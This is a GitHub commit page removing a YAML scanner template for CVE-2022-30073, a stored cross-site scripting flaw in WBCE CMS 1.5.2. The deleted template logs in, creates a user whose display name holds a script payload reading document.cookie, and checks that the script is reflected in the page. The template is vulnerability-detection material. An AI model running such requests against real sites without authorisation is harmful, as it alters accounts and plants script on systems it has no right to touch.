Delete CVE-2022-30073.yaml
Ritik Chaddha
GitHub
parent
87e9fa3ac2
commit
9231d1211b
|
|
@ -1,68 +0,0 @@
|
||||||
id: CVE-2022-30073
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: WBCE CMS v1.5.2 XSS Stored
|
|
||||||
author: arafatansari
|
|
||||||
severity: medium
|
|
||||||
description: |
|
|
||||||
WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\user\save.php Display Name parameters.
|
|
||||||
reference:
|
|
||||||
- https://github.com/APTX-4879/CVE
|
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073
|
|
||||||
- https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf
|
|
||||||
classification:
|
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
||||||
cvss-score: 5.4
|
|
||||||
cve-id: CVE-2022-30073
|
|
||||||
cwe-id: CWE-79
|
|
||||||
metadata:
|
|
||||||
verified: "true"
|
|
||||||
tags: cve,cve2022,wbcecms,xss,authenticated
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- raw:
|
|
||||||
- |
|
|
||||||
POST /wbce/admin/login/index.php HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
|
||||||
|
|
||||||
url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login
|
|
||||||
|
|
||||||
- |
|
|
||||||
GET /wbce/admin/users/index.php HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
|
||||||
|
|
||||||
- |
|
|
||||||
POST /wbce/admin/users/index.php HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
|
||||||
|
|
||||||
formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=temp123&password=tempbitch&password2=tempbitch&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=temp121%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
|
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
extractors:
|
|
||||||
- type: regex
|
|
||||||
name: formtoken
|
|
||||||
part: body
|
|
||||||
internal: true
|
|
||||||
group: 1
|
|
||||||
regex:
|
|
||||||
- '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
|
|
||||||
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: body
|
|
||||||
words:
|
|
||||||
- 'value="<script>alert(document.cookie)</script>" class="wdt250'
|
|
||||||
|
|
||||||
- type: word
|
|
||||||
part: header
|
|
||||||
words:
|
|
||||||
- text/html
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
Loading…
Reference in New Issue